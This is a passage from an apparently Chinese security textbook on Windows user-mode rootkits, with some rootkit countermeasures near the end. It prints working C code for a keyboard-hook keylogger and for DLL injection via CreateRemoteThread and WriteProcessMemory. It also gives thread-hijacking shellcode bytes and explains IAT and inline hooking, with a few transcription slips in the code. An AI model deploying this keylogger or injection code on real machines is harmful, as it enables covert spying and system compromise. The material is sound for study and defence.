现在,有几种方法能够实现刚才所提到的钩子,其中一些方法得到Microsoft的支持,而其他方法则不被支持。这一点很重要,因为这意味着Rootkit的意图取决于Rootkit的作者,可以是你的员工安装的像击键记录程序那样的系统监控、盗窃程序或者其他软件。Sony BMG在2005年组合到CD中的Rootkit是一个骇人听闻的实例。Sony CD在用户播放时会在计算机上安装扩展版权保护(Extended Copyright Protection,XCP)和MediaMax-3软件。这个Rootkit在安全研究人员Mark Russinovich于SysInternals测试RootkitReyealer的新版本时发现。尽管这是一个旧的实例,但是XCP说明了隐藏和保持不被发现对于合法的目的的重要性,以及Rootkit的恶意性完全源于创作者的意图的原因。XCP Rootkit设计用来隐藏所有文件、注册表项以及以$sys$开始的进程。这么做的意图是Sony的DRM解决方案利用Rootkit所创建的隐藏能力来确保DRM不会从机器上删除掉,如果用户试图获取DRM CD上的信息,CD是无法使用的;但是,任何应用程序包括恶意软件可以利用这个功能,只需将文件名加上$sys$前缀。Sony的实例是商业机构选择使用Rootkit来达到一个有争议的“好”意图,但是他们实现这一意图的手段不正确。当然,其他恶意的Rootkit作者可以使用与XCP应用程序相同的技术实现大不相同的意图。 注意:关于Rootkit的使用、效果和意图已经争论了多年,我们在本书的这个部分不再参与这一争论。我们的目标是提供关于Rootkit功能、实例和对策的信息。 在进入复杂的话题之前,我们将回顾一些对理解Rootkit功能的背景很重要的计算、编程和操作系统结构概念。这些Windows资源、程序库和组件是Rootkit功能所针对的主题,用来隐藏、掩盖或者以其他方式隐藏系统活动。 进程和线程 进程(process)是计算机系统中执行的程序的一个实例,而线程(thread)是执行单独指令的子进程(从进程中产生),一般是并行执行的。例如,在一个系统上执行一个Rootkit<process>可能同时产生多个线程。进程和线程之间的不同很关键,因为几乎每种主要的用户模式Rootkit技术都处理线程而不是进程。 体系结构层次 在x86计算机系统体系结构中,具有授予特权与抵御系统错误和未授权访问的多个保护层次。这种环状的系统提供了特定的访问级别,这些级别一般通过CPU模式来实现。这些环(ring)是层次化的,从具有最高访问级别的Ring 0开始到最低级别的Ring 3。在大部分操作系统中,Ring 0保留给内存和CPU功能,比如内核操作。在Windows OS中支持两个环Ring 0和Ring 3,这对于Rootkit的功能很重要。在Ring 0中运行的线程处于核心模式,可以猜到Ring 3中运行的线程是用户模式的。我们将在讨论内核模式Rootkit时更详细地讲述保护层次,这里要记住一点:OS代码在Ring 0中运行,应用程序代码在Ring 3中运行。 系统调用 用户模式应用程序通过执行系统调用(system call)来与内核接口,系统调用是从操作系统提供的动态链接库(Dynamic Link Librarie,DLL)中输出的特定函数。当应用程序进行系统调用时,确定的系统调用的执行通过一系列预先确定的函数调用路由到内核。这意味着系统调用A运行时,函数调用X、Y和Z的执行始终保持同样的顺序。Rootkit函数将采用这些标准的操作系统调用来运行。在下面的例子中,我们将指出几个Rootkit大显身手的地方,它们在这里劫持或者挂钩(hook)预先确定的系统调用路径并在这些路径上添加新的功能。 例如,如果一个用户模式的应用程序希望列出C驱动器上一个目录中的所有文件,这个应用程序将会调用Windows函数FindFirstFile(),这个函数从kernel32.DLL输出。为了调整系统调用路径,用户模式Rootkit将寻找kernel32.DLL中的这个函数,并且在该函数被调用时修改它,执行Rootkit代码,以替代传统上在kernel32.DLL中找到的代码,Rootkit简单地调用kernel32.DLL中的真实代码并且在结果返回给应用程序之前进行过滤。 在增加操作系统稳定性的努力中,Microsoft在每个进程中实现了虚拟地址,这样每个用户应用程序不会干扰其他用户执行的其他应用程序。因此,当应用程序请求访问特定的内存地址时,操作系统拦截这个调用并且可能拒绝对该内存地址的访问。但是,因为每个Windows用户模式应用程序运行于自己的虚拟内存空间中,Rootkit必须挂钩和调整每个运行在系统上的应用程序的内存空间中的系统调用路径,以确保所有结果被正确过滤。此外,Rootkit必须在新的应用程序装入时得到通知,这样它也能拦截该应用程序的系统调用。这种技术与内核模式钩子技术不同,内核模式钩子不需要持续拦截系统调用。具体地说,内核模式Rootkit可以挂钩和拦截单个内核系统调用,然后所有的用户模式调用都将被拦截。 动态链接库 动态链接库(DLL,扩展名为.dll)是Microsoft Windows操作系统中的共享程序库。所有Windows DLL编码为可移植执行体(Portable Executable,PE)格式,这和可执行程序文件(.exe)格式相同。这些程序库在程序执行时装入应用程序中,并且保留在预先确定的文件位置上。每个DLL可以动态或者静态地映射到应用程序的内存空间,所以应用程序可以在不访问磁盘上的DLL的情况下访问DLL的函数。在动态映射的情况下,应用程序在执行时由应用程序装入。动态链接库的一个重要好处是可以更新以修复缺陷或者安全问题,使用它们的应用程序能够立刻访问修复后的代码。当DLL动态地编译到应用程序中时,来自DLL的函数被复制到应用程序的二进制代码中。这使程序员可以在编译的时候连接程序库,不需要相同的程序库或者插件的多余拷贝。 有必要注意一个特殊的DLL:Kernel32.dll,这是一个处理输入/输出、中断和内存管理的用户模式程序。之所以要专门谈到这个DLL,是因为许多人认为这个DLL是存在于内核。事实上它不存在于内核,而是在用户空间中与User32.dll协同工作。 API函数 Windows操作系统中采用的应用编程接口(API)是用来与所有编程语言直接通信的,有8种控制Windows操作系统所有系统访问权的类别。表3-1描述了这些WinAPI类别、相互之间的关系和位置。 关于16~64位应用程序的Windows API要素,可在Microsoft开发网(MSDN,msdn.microsoft.com)上找到。每个API都很重要,因为它们都具有Rootkit运作所需要挂钩、绕过或者修改的函数。更具有恶意性和高效率的Rootkit将会确保拦截每种服务类中的函数;否则,防Rootkit工具可能确定Rootkit的存在。 3.5.3 注入技术 本小节阐述一些用户模式Rootkit所采用的更复杂的函数和技术的基础知识。任何用户模式Rootkit的第一个步骤都是将其代码注入希望安装钩子的进程中。现在,我们来回顾一下当今使用的注入技术。我们只关注基础知识,因为在过去的两年中,在应用程序中采用用户模式钩子技术的复杂性已经大大增强,这使得我们无法给出完美的钩子实例。改进的防病毒软件、64位操作系统以及托管代码(managed code,在虚拟机下运行的代码)意味着每种注入和钩子技术各有长短,一种技术本身不是百分之百有效的。 在Rootkit挂钩一个函数以及在进程中转移一个函数的执行路径时,必须将本身放在希望挂钩的进程中。这通常要求DLL注入或者其他使该进程执行Rootkit代码的存根(stub)代码。如果Rootkit创作者不能得到进程中执行的代码,他的代码就不能挂钩进程中的函数调用。 那么DLL注入进程是怎样工作的?在进程中注入新代码有3种主要途径:Windows钩子、使用带LoadLibrary()的CreateRemoteThread和CreateRemoteThread的变种。 Windows钩子 在Windows操作系统中,具备图形界面的应用程序的大部分通信使用消息来进行。一个编译用于接收消息的应用程序将创建一个消息队列,当操作系统发出新消息时,应用程序从这个队列中读取新消息。例如,在Windows应用程序中,当你用鼠标左键单击OK按钮时,就向应用程序的消息队列发送一个WM_LBUTTONDOWN消息。然后应用程序将读取该消息,执行一系列操作来响应这一消息,接着等待下一个消息。控制台应用程序(也就是没有标准的Windows用户界面的程序)也可以注册,以接收Windows消息,但是传统的控制台应用程序不处理Windows消息。 消息通信在Windows应用程序中很重要,因为Microsoft已经创建了一种方法,对特定用户运行的所有应用程序的消息进行拦截(或称挂钩)。尽管这是Microsoft所支持的接口并且有很多合法的用途,但是也有很多有疑问的用法。传统上,这些有疑问的用法包括间谍软件和恶意软件中的击键记录程序和数据记录程序。因为Microsoft支持这种方法,所以有很多可用的文档。实际上,在MSDN中第一篇关于消息钩子的文章写于1993年!因为这种方法得到支持,所以它非常有效、简单,更重要的是,非常可靠。 但是,这种方法也有局限性。传统的不处理Windows消息的控制台应用程序不能通过这种方法挂钩。而且,前面已经提到过,使用这种方法安装的Windows钩子只能与运行在安装钩子的用户上下文运行的进程挂钩。这种局限性看上去可能是个顽疾,但是通常不是很大的问题,因为一个用户所运行的几乎所有应用程序都在该用户的上下文中运行,这些程序包括Internet Explorer和Windows Explorer,因而不受这种局限性的影响。 我们已经提到,这种方法有很多文档,所以我们将只提供其工作原理的简单回顾。本质上,开发人员必须创建一个具有接收Windows消息的函数的DLL。接着这个函数调用SetWindowsHookEx()函数通过操作系统注册。 我们来看一些代码。我们有一个名为Hook.dll的DLL,输出一个函数调用HookProcFunc。这个函数处理所有被拦截的Windows消息,在我们的钩子安装应用程序中,创建如下代码: bool InstallHook() { HookProc HookProcFunc; if(HookProcFunc=(HookProc):GetProcAddress(g_hHookDll,"HookProc")) { if(g_hHook=SetWindowsHookEx(WH_CBT,HookProcFunc,g_hHookDll,0)) return true; } return false; } 注意,我们没有包含装入DLL的代码,这将由调用LoadLibrary()来完成。现在HookProc已经安装,操作系统自动将Hook.dll注入到该用户执行的每个进程中,并且确保Windows消息在被实际应用程序(如Internet Explorer)接收之前,传递给HookProcFunc()。HookProcFunc相当简单: LRESULT CALLBACK HookProcFunc(UINT message,WPARAM wParam,LPARAM lParam) { if(message==HCBT_KEYSKIPPED&&(lParam&0x40000000)){ if((wParam==VK_SPACE)||(wParam==VK_RETURN)|| (wParam==VK_TAB)||(wParam>=0x2f)&&(wParam<=0x100)){ if(wParam==VK_RETURN||wParam==VK_TAB){ WriteKeyStroke('\n'); }else{ BYTE keyStateArr[256]; WORD word; UINT scanCode=lParam; char ch; GetKeyboardState(keyStateArr); ToAscii(wParam,scanCode,keyStateArr,&word,0); ch=(char)word; if((GetKeyState(VK_SHIFT)&0x8000)&& wParam>='a'&&wParam='z') ch+='A'-'a'; WriteKeyStroke(ch); } } } return CallNextHookEx(0,message,wParam,lParam); } 这个钩子函数查看传入的消息是否为HCBT_KEYSKIPPED,这个消息在一个按键消息从系统按键队列中移除时发送,因此每当键盘上按下一个键时就会收到这个消息。接下来,钩子函数进行检查,确保按下的键为有效键,如果按下的是Enter键,在日志文件中输入一个换行符,否则,写入键盘对应的字符。 虽然这是个非常简单的实例,但是它确实是编写基于Windows钩子的击键记录程序所需要的所有内容。使用这种方法,你也可以在每次接收到Windows消息时捕捉桌面的屏幕截图,甚至打开录音。某些间谍软件和恶意软件以捕捉屏幕而闻名,它们捕捉的不仅是挂钩的应用程序,还包括屏幕上的任何其他内容。 这种方法的最大缺点是容易被发现,你也可以找到一些代码样例,避免你的应用程序成为这种方法的受害者。 大部分的Windows钩子实现中还有另一个问题:钩子似乎从来都不曾“有效”过。因为操作系统负责确保钩子放置到进程中,所以必须保护操作系统的可靠性,确保钩子安装时操作系统不会崩溃。因此,钩子在进程的队列中接收到一个新的消息时安装。如果在调用Unhook WindowsHookEx()函数(这个函数去掉消息队列的钩子)之前没有接收到消息,Rootkit钩子将不会被安装。这种情况发生的次数超出你的想象,特别是在Rootkit所要挂钩的进程、目标进程的执行期间以及钩子的实现非常特殊的时候。为了避免这种问题的发生,设置钩子的应用程序也应该发送一个“测试消息”给钩子,以确保DLL和钩子正确地安装到进程中。 使用带LoadLibrary()的CreateRemoteThread 提到DLL注入,在各种Windows操作系统的进程中注入DLL有两种常见的方法。第一种是使用函数CreateRemoteThread,这个函数在指定进程中启动一个新线程。一旦这个线程装入该进程,就会执行Rootkit创作者提供的一个特殊DLL的代码。这种技术很简单,已经出现了很多年。除了我们在这里提到的细节之外,在Web上有几千个实例,包括一些提供源代码的稳定的钩子引擎,所以只要上Google就可以得到CreateRemoteThread钩子的良方。如果网上的例子不管用,MSDN(http://msdn.microsoft.com)中发布了线程函数的详细资料。 CreateRemoteThread()的参数包含注入的DLL名称,在这个例子中是evil_rootkit.dll。为了解析这些输入项,这段代码在线程于远程进程中启动时(在GetProcAddress()的帮助下)执行LoadLibrary()函数。因为这段代码将在独立的地址空间中执行,所以我们必须修改字符串引用,这通过使用VirtualAllocEx()函数并将该字符串写入新的可用地址空间中来完成。通过将指针传递给RemoteString(),这段代码可以装入,我们可以关闭句柄。 #define DLL_NAME"evil_Rootkit.dll" BOOL InjectDLL(DWORD ProcessID) { HANDLE Proc; char buf[50]={0}; LPVOID RemoteString,LoadLibAddy; if(!ProcessID) return FALSE; Proc=OpenProcess(CREATE_THREAD_ACCESS,FALSE,ProcessID); if(!Proc) { sprintf(buf,"OpenProcess()failed:%d",GetLastError()); MessageBox(NULL,buf,"InjectDLL",NULL); return FALSE; } LoadLibAddy=(LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); RemoteString=(LPVOID)VirtualAllocEx(Proc,NULL,strlen(DLL_NAME), MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE); WriteProcessMemory(Proc,(LPVOID)RemoteString,DLL_NAME,strlen(DLL_NAME),NULL); CreateRemoteThread(Proc,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString,NULL,NULL); CloseHandle(Proc); return true; } 这段代码将在OpenProcess()打开的目标进程中创建一个新线程,接着这个线程将调用LoadLibrary()并且将我们的evil_rootkit.dll插入进程中。一旦装入这个DLL,线程将会退出,该线程的空间中现在有了evil_rootkit.dll的映射。 在你尝试从一个64位进程中将一个DLL注入32位进程时这种注入技术将会无效,反之亦然,这是64位内核的Windows-on-Windows(WoW64)的问题。具体地说,64位进程要求64位的指针,因此我们传递给CreateRemoteThread()的用于LoadLibrary()的指针必须是64位指针。因为我们的注入应用程序是32位的,不能指定一个64位指针。这个问题如何解决?要有两个注入应用程序——一个用于32位,另一个用于64位。 使用带WriteProcessMemory()的CreateRemoteThread 将一个DLL注入到进程中的第二种方法更加隐蔽一些。CreateRemoteThread()可以执行你的代码来代替操作系统调用LoadLibrary()。你实际使用的是WriteProcessMemory(),这是我们在前一个进程中写入DLL名称所使用的函数,现在我们用它来将整个函数集写入进程的内存空间,然后用CreateRemoteThread()调用刚刚写入进程内存的函数。 这种方法有许多不足,我们将逐个解决。首先来看看我们的进程(这个进程包含了我们希望在目标进程中包含的实例代码)在内存中的样子,再看看我们将自己的数据通过WriteProcessMemory()写入到目标进程时目标进程在内存中的样子。本小节的代码是由本书的作者编写的。 正如你在图3-1中所看到的,我们必须将自己的函数数据复制到目标进程。而且,任何数据(如配置参数、选项等)都必须复制到目标进程,因为NewFunc复制到目标进程之后就无法访问任何注入进程的数据。你应该为目标进程中的NewFunc复制什么类型的数据?使用这种方法的问题之一是你复制到目标进程的代码不能引用除了kernel32.dll、ntdll.dll和user32.dll之外的任何外部DLL,因为只有前述的3个DLL能够保证映射到每个进程的相同地址。user32.dll不能保证映射到相同的地址,但是通常可以做到。Microsoft开发人员选择始终分配相同地址的原因是有争论的,但是许多人认为这是与性能或者向后兼容性相关的。因此,如果你想要访问在目标进程中不可用的DLL函数,必须向你所希望使用的函数(如LoadLibrary()和GetProcAddress())传递一个指针。而且,因为静态字符串存储在二进制文件的数据段,任何在NewFunc中使用的静态字符串将不会被复制到目标进程中,所以,所有字符串应该通过使用WriteProcess-Memory()复制到目标进程来传递给NewFunc。因为需要复制的数据很多,建议创建一个包含所需要传递的结构,这样能够简单地引用所有数据,而不必频繁地计算偏移量,并且保存你复制数据的位置的内存地址。下面是一个名为HOOKDATA的结构: typedef HINSTANCE(WINAPI*FPLOADLIBRARY)(LPCTSTR); typedef FARPROC(WINAPI*FPGETPROCADDRESS)(HMODULE,LPCSTR); typedef struct{ FPLOADLIBRARY fnLoadLibrary; FPGETPROCADDRESS fnGetProcAddress; char lpszDLLName[128];//buffer for name of DLL to load }HOOKDATA; 图 3-1 将数据注入到新的挂钩进程的结构 定义了所需要传递的数据和希望注入的函数之后,必须复制NewFunc,这是目标进程中启动线程时将要执行的函数。为了将数据从一个位置复制到另一个位置,必须知道数据的大小。可以手工地反汇编代码或者使用下列hack程序来确定NewFunc的大小: static DWORD WINAPI NewFunc(HOOKDATA*pHookData) { //call LoadLibrary.. return pHookData->fnLoadLibrary(pData->lpszDLLName); } static void AfterNewFunc(void) { } AfterNewFunc函数在编译时一般将被直接放在NewFunc代码之后,你可以利用编译器以简单的计算返回NewFunc的大小: DWORD dwCodeSize=(PCHAR)AfterNewFunc-(PCHAR)NewFunc; 现在你已经知道了代码的大小,就可以将其复制到目标进程并且创建你的线程了! BOOL InjectDLL(DWORD ProcessID) { HANDLE Proc; char buf[50]={0}; HOOKDATA*pHookData; BYTE*pNewFunc; DWORD dwCodeSize=0; if(!ProcessID) return FALSE; Proc=OpenProcess(CREATE_THREAD_ACCESS,FALSE,ProcessID); if(!Proc) { sprintf(buf,"OpenProcess()failed:%d",GetLastError()); MessageBox(NULL,buf,"InjectDLL",NULL); return FALSE; } pHookData=(HOOKDATA*)VirtualAllocEx(Proc,NULL,sizeof(HOOKDATA), MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE); pHookData->fnLoadLibrary=(LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); WriteProcessMemory(Proc,(LPVOID)pHookData->lpszDLLName,DLL_NAME, strlen(DLL_NAME),NULL); pNewFunc=(BYTE*)VirtualAllocEx(Proc,NULL,dwCodeSize), MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE); dwCodeSize=(PCHAR)AfterNewFunc-(PCHAR)NewFunc; WriteProcessMemory(Proc,(LPVOID)NewFunc,NewFunc,dwCodeSize,NULL); CreateRemoteThread(Proc,NULL,NULL,(LPTHREAD_START_ROUTINE)pNewFunc, (LPVOID)pHookData,NULL,NULL); CloseHandle(Proc); return true; } 现在,这段代码在新的进程中执行,执行一个能够装入你的邪恶的DLL或者执行本章稍后谈到的其他挂钩活动的函数。 对非系统进程的高级DLL注入 在rootkit.com中xshadow所写的一篇名为“Executing Arbitrary Code in a Chosen Process(or Advanced DLL Injection)”(在选择的进程中执行任意代码(高级DLL注入))的文章中,提到了另一种在别的进程中执行代码的技术。xshadow的研究和实现有益于Vanquish Rootkit中的注入技术的更新。完整的文章和代码样例可以在https://www.Rootkit.com/newsread.php?newsid=53上找到。这个进程类似于刚刚描述过的方法,唯一的例外是:这种方法不在目标进程中创建一个新的线程,而是劫持一个现有的线程并使其执行代码,然后返回该线程正在进行的工作。 这种方法的工作原理如下: 1)监控新进程的创建。 2)当新的进程创建时,查找第一个线程的句柄。 3)调用线程句柄的SuspendThread()函数,这个函数暂停线程的执行。 4)将线程的前几条汇编指令(这是进程希望执行的常规代码)修改为执行代码并且将DLL装入进程任意内存空间的LoadLibrary调用。 步骤4是最困难的操作,因为开发人员必须知道进程的执行方式以及CPU中的各种寄存器的工作方式。我们来简单地讲述一下关于汇编的知识,以描述步骤4的实现。 在x86体系结构中,有一组CPU存储区域(寄存器)用于快速地处理指令。表3-2列出了使用汇编代码进行工作和进行系统操作时需要知道和理解的重要寄存器。 步骤4按照下列的顺序执行这个DLL注入。首先,我们使用GetThreadContext()读取线程的上下文标志。这些信息包含表3-2中描述的处理器寄存器的信息。 下一步是将代码复制到进程内存空间中任意的一个地址。我们在CreateRemoteThread/WriteProcessMemory的例子中做过这个工作,方法是寻找我们的函数的地址,并且将其复制到目标进程,在这里我们也同样这么做,但是有一点要特别注意。当我们的代码被调用时,必须确保所有表3-2中描述的寄存器具有和代码执行前相同的值,这样被劫持的线程才能继续正常执行。有一个很好的汇编指令pushad,以及相对应的指令popad,这两个指令会将所有寄存器的一份拷贝压入内存,以及在以后将这份拷贝返回给寄存器。在函数的开始和结束只要调用pushad和popad就可以处理所有的问题,所以我们所必须关注的只是在函数中执行LoadLibrary()调用。 现在我们在目标进程中有了代码,必须调整进程的上下文(包括下一个执行的指令)以执行我们的代码。 我们提到过必须读取进程的上下文,这可以通过调用GetThreadContext()来完成。这个函数返回由所有进程上下文填充而成的一个结构,包括各种寄存器的值。看看从MSDN免费下载的Windows SDK中包含的winnt.h头文件,可以找到这个结构的完整细节,这超出了本书的范围。 CONTEXT ctx; GetThreadContext(hThread,&ctx); 现在我们已经有了线程的上下文,可以用代码来调整上下文的值。首先,我们必须定义执行pushad/popad和LoadLibrary()调用的函数。最简单的方法是使用汇编,代码如下: pushad push 0xAAAAAAAA;Argument for LoadLibraryA,e.g,our DLL_NAME mov esi,0xBBBBBBBB;Address of LoadLibraryA call esi popad ret 注意两个具有占位符值的内存地址(0xAAAAAAAA和0xBBBBBBBB),它们必须由注入函数中定义的真实值代替。 注意:分号之后的任何内容都是注释而不是汇编语句。 因为所有汇编指令也可以用十六进制数定义,我们必须将这个汇编程序转换为一系列十六进制字符并且替换占位地址值。一旦这些值以十六进制表示,我们就可以将其转换为ASCII表示,例如可以放入源代码中的可打印字符。在我们将汇编程序转换为十六进制并且在变量pbData中存储数据之后,就有了如下的数据: EVIL_ROOTKIT.DLL//do not forget the null 0x60//pushad 0x68 0xaa 0xaa 0xaa 0xaa//push dword 0xbe 0xbb 0xbb 0xbb 0xbb//mov esi,dword 0xff 0xd6//call esi 0x61//popad 0xc3//ret 我们还在十六进制代码的开始处包含了文本字符串EVIL_ROOTKIT.DLL,这只是为了在目标进程中仅进行一次内存分配,而不是两次(一次用于字符串,一次用于函数代码)。在我们用这段代码进行任何工作之前,应该得到LoadLibrary()的地址并且用这个地址替换pbData中的0xBBBBBBBB地址。 现在我们有了这些数据(pbData),必须为之在目标进程中分配内存并且将数据复制到进程内存中: pCodeBase=(BYTE*)VirtualAllocEx(Proc,NULL,dwNumBytes, MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE); WriteProcessMemory(Proc,(LPVOID)pCodeBase,pbData,dwCodeSize,NULL); pCodeBase现在包含了一个指向目标进程中内存的指针,还包含了DLL名称和汇编代码的一个副本。我们现在只要用必须传递给LoadLibrary()的DLL名称的正确地址最后一次更新代码就可以了。重新调用LoadLibrary需要一个带有存在于目标进程中而且可以访问的地址的参数,这就是我们将其作为复制到目标进程的代码的一部分的原因。因为我们将DLL名称放在复制代码的开始,所以知道该字符串的起点,可以用pCodeBase的地址替换0xAAAAAAAA值。最后,我们必须告诉进程从代码的起点开始执行,这个起点紧接在DLL名称之后: ctx.Eip=(DWORD)pCodeBase+sizeof("EVIL_ROOTKIT.DLL"); ctx.Esp-=4;//We must decrement esp so eip will be executed 然后,我们设置线程上下文并且替换现有上下文,使线程启动并且执行代码: SetThreadContext(hThread,&ctx); ResumeThread(hThread); 这就是高级DLL注入技术的一个简单说明,但是要使这种技术有效还需要其他的支持代码。Web上有可用的代码样例,在Vanquish中有实用的代码实现。 这种技术非常详尽且具有技巧性,但是,除了Vanquish Rootkit以外并没有太多的应用。大部分恶意软件和Rootkit采用第一种或者第二种DLL注入方法。最后这种方法在64位环境下也不能工作,除非重写为使用64位偏移量。而且,这种技术对于托管代码(如.NET)也无效,因为.NET在线程被挂起之前会接管线程。 3.5.4 钩子技术 尽管挂钩进程有多种方法和技术,但我们将讨论两种与Rootkit技术相关的。第一种是输入地址表钩子(Import Address Table hooking),第二种是嵌入函数钩子(inline function hooking)。 输入地址表钩子 这种技术相当简单并且广泛地用于邪恶和良性的编程。当一个可执行文件装入时,Windows读取文件中的可移植执行体(PE)结构,并且将可执行文件装入到内存。PE格式是修改过的Unix文件格式,是Windows中所有EXE、DLL、SYS和OBJ文件的格式,对Windows体系结构非常关键。执行文件将会列出所需要的来自每个DLL的所有函数。因为进程是动态的,这些变量需要在运行时之前装入用于访问。Windows装入程序能够制作一张所有函数指针的表格,称为输入地址表(Import Address Table,IAT)。通过创建这个IAT,可执行程序能够在每次调用API时进行一个跳转,识别所需程序库的存储位置。这种技术使运行时性能很高,但是执行程序的首次装入可能会较慢。 现在一个Rootkit DLL必须做的就是修改IAT中特定函数的地址,这样当应用程序调用特定函数时,就会调用Rootkit的函数。 嵌入函数钩子 第二种钩子技术被称为嵌入函数钩子。这种技术用Rootkit指令来替换目标函数的头5个字节,从而修改核心系统DLL。通过创建一个指向Rootkit的跳转,钩子函数能够控制函数并且修改返回的数据。 钩子引擎 因为用户模式钩子已经相当多,许多供应商将钩子用于合法的目的,比如授权、数据保护甚至简单的应用程序功能。因为这些需求,已经开发出了多种钩子引擎,帮助开发人员制作用户模式钩子。这些引擎也可以为Rootkit创作者所用,但是我们还没有发现太多这种情况。EasyHook可能是最完整和稳定的钩子引擎,具有许多超出简单用户模式钩子引擎的功能。下面是EasyHook作者对这个引擎的描述: EasyHook 起源于Microsoft Detours,支持从完全托管环境,例如使用Windows 2000 SP4及更新版本(包括Windows XP x64、Windows Vista x64和Windows Server 2008 x64)的C#,使用纯粹的托管代码来扩展(挂钩)非托管代码(API)。它也能支持32位和64位内核模式钩子和非托管用户模式API,这使你可以在不需要客户PC上有NET Framework的情况下挂钩目标进程。一种试验性的隐身注入能使钩子避开大部分当今的防病毒软件。 关于EasyHook很重要的一点是,它的创作者非常擅长于确保钩子功能对于注入和删除钩子都很稳定。 EasyHook有很多特性。下面是一个能够帮助你为自己的钩子项目决定选择EasyHook的摘要。而且,查看EasyHook的源代码(它是个开源软件),你可以看到很好应用前述的钩子技术的代码实例。 ·所谓的线程死锁屏障(Thread Deadlock Barrier)能消除许多挂钩未知API时的核心问题。 ·你可以为非托管的API编写托管钩子句柄,例如,用C#编写钩子! ·你可以使用所有方便的托管代码提供程序,如.NET Remoting、Windows Presentation Foundation(WPF)和Windows Communication Foundation(WCF)。 ·这是个具有文档的、快速和可移植的纯非托管钩子API。 ·提供32位和64位内核模式钩子的支持,包括绕过PatchGuard! ·在钩子进程中没有资源和内存泄漏。 ·包含不会引起任何当前的防病毒软件注意的隐身注入机制。 ·EasyHook32.dll和EasyHook64.dll是纯粹的非托管模块,可以在不安装任何.NET framework的情况下使用! ·所有钩子都很稳定地安装并且自动删除。 ·采用完全未存在于文档中的API提供对Windows Vista SP1 x64和Windows Server 2008 SP1 x64的支持,允许挂钩到任何终端会话中。 ·你可以为任何CPU编写注入程序库和主进程,这将使你能够在所有情况下,使用非常相同的汇编程序从64位和32位进程中注入代码到32位和64位进程。 如果你需要挂钩或者希望学习用户模式中正确编写钩子的细节,一定要查看EasyHook网站。本书网站(http://www.malwarehackingexposed.com)上有一个指向EasyHook网站的链接,你也可以在http://www.codeplex.com/easyhook上搜索EasyHook。 3.5.5 用户模式Rootkit实例 过去的10年内发现和分析了许多常见的Rootkit,但是3个“经典”的例子十分引人注目。下面的举例将提供用户模式Rootkit工作的详细背景,Rootkit与WinAPI的关系,以及与相关的木马的关系。 Vanquish Vanquish是一个围绕DLL注入技术设计,用于隐藏文件、文件夹和注册表项的Rootkit,它还包含记录密码的能力。本书使用的版本是Vanquish v0.2.1,因为它随处可见,我们从来没有发现它的问题,通过Google上的快速搜索可以得到一个代码副本。但是要记住两件事情:1)防病毒软件可能发现这个软件包并且试图隔离或者删除它。2)它被设计为使用管理员特权运行。 Vanquish可以在Windows 2000、XP和2003的32位版本中运行。在本书写作时,我们还没有在Vista上测试过它(也没有测试过任何Rootkit)。 组件 这个软件包包含如下文件和预期功能。.zip包包含Vanquish文件夹和bin目录。软件包的组件详见表3-3和表3-4。 Vanquish DLL vanquish.dll包含了在DLL注入进程后执行各种功能的子模块。表3-4提供了这些子模块的信息,它们所提供给vanquish Rootkit的特性,以及所影响的Windows服务功能。 将它们放到一起,你会得到…… 每次的DLL注入都为Rootkit提供一个独特的服务,因为它们都挂钩一个独立的API并且创建新的进程。Vanquish早期版本(pre 0.1~beta9)中的DLL注入使用CreateRemoteThread注入技术。这种技术进行了修改,以便消除偶然发生的、进程在挂钩之前就已完成的情况,这在前面已经讨论过。挂钩的DLL可见对于用户有什么好处呢?所以,我们将要使用的版本(v0.2.1)采用本章前面描述过的高级DLL注入。 Vanquish通过运行setup.cmd批文件安装到目标机器上。这个批文件从installer.cmd脚本开始,这个脚本会检查以前的Vanquish安装并且进行Rootkit安装。安装程序调用vanquish.exe借助嵌入函数钩子进行vanquish.dll的高级DLL注入。 Vanquish对策 对于用户模式的Rootkit,有两种与有效的对策相关的基本思路。首先是预防性的高效率计算机安全实践,其次是积极地使用最近几年流行起来的大量Rootkit检测工具。Vanquish大约是最容易防御的Rootkit,因为它的源代码已经可以获得,并且不要求任何高级的隐蔽性,考虑到审慎的网络安全防御,你受到Rootkit侵害的可能性较低。第10章中列出的所有Rootkit检测工具都能发现Vanquish。 计算机安全实践 在不知不觉中拥有一个Rootkit的主要原因是系统泄密,这一点也不令人惊讶。虽然在过去的25年中防病毒技术已经有了发展,防火墙、入侵检测和防御系统、网络访问控制和Web监控的极大进步也已改变了企业安全态势。但是,尽管有大量的工具和技术,受到侵害的系统仍然不断增加,而进行彻底的计算机安全实践很可能减少这种侵害。如果用户和安全管理员不遵循正确的程序或者公司策略绕过安全控制,那么世界上最好的技术也没有任何价值。 Rootkit可以从几个不同的攻击方向轻松地放置到系统上,比如通过蠕虫、P2P或者木马,所以使用端口阻塞、防火墙和Web监控作为预防性策略,有可能节省很多删除和重建受感染机器的时间。强密码策略的实施、减少组和共享账户以及对社会工程的警惕性也很有助于减少被恶意软件远程侵入的机器的数量。 Rootkit检测 有多种Rootkit检测工具可以用于检测和删除不同类型的Rootkit,所有工具都能检测Vanquish。在本书的后面,我们用一整章(第10章)来专门讲述Rootkit检测,将详细地介绍几种工具。最常用的Rootkit工具在表3-5中列出。 Hacker Defender Hacker Defender缩写为HxDef,可能是最具标志性的Rootkit。它由Holy Father和Ratter/29A开发和发行,为Windows NT/2000/XP而设计。HxDef是一个高度可定制的Rootkit,包含一个配置文件、一个后门和一个重定向程序。这些工具构成了一个极其强大的Rootkit。这个程序的概念是挂钩关键的Windows API,以便控制单独的函数。一旦这些函数得到控制,Rootkit就能够处理一些API数据调用。在这个过程中,可以处理和隐藏配置的任何文件、服务、驱动程序或者注册表键值,使HxDef成为几乎不可见的Rootkit。 尽管HxDef和所有Rootkit一样都是可探测的,但是它已经花费了许多事故处理人员、系统管理员和取证调查人员的金钱。在我们快速地进入这个程序的特性和功能时,请注意我们所用的是HxDef的100r版本。 用户可以选择使HxDef作为一个服务安装和运行,也可以单独运行(不作为服务)。作为服务运行使Rootkit可以在系统重启之后继续执行。HxDef也可以重新装入.ini文件来更新程序配置,当然也可以卸载。使用默认的.ini文件时需要注意的一点是,在你安装这个程序之后,所有HxDef文件将会消失,因为这是Rootkit的一个功能。为了卸载Rootkit,你必须知道它的安装目录,所以一定要记录文档。 